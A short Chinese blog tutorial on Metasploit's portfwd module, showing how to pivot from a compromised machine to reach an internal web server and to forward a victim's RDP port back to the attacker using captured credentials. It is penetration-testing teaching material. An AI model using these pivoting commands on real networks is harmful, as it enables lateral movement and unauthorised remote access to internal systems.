【内网穿透】metasploit端口转发

前言

  • metasploit 端口转发使用

portfwd模块

端口映射和端口转发,使用公网的是msf

本机是172.31.239.104,想要访问的是被攻陷192.168.0.115网中的一个ip段网站192.168.0.100

利用portfwd模块来将192.168.0.100:80端口映射到本机的3389端口,让我们可以通过本机访问其他机器的内网网站

1
portfwd add -L 172.31.239.104 -l 3389 -p 80 -r 192.168.0.100

image-20210824161405075

image-20210824161728202

也可以直接转发端口,比如我们已经获取了192.168.0.115的3389登陆密码,但是他处于内网无法登陆,就直接将它的3389端口转发出来到我们本地的3389端口

1
2
portfwd flush //清空端口connect
portfwd add -l 3389 -p 3389 -r 192.168.0.115

image-20210824162018460

就可以直接利用本地访问他们3389的端口,就可以远程连接了

image-20210824162202355

查看列表

1
portfwd list

image-20210824162352397

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【内网穿透】metasploit端口转发

文章作者:孤桜懶契

发布时间:2021年08月24日 - 15:48:12

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/111.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------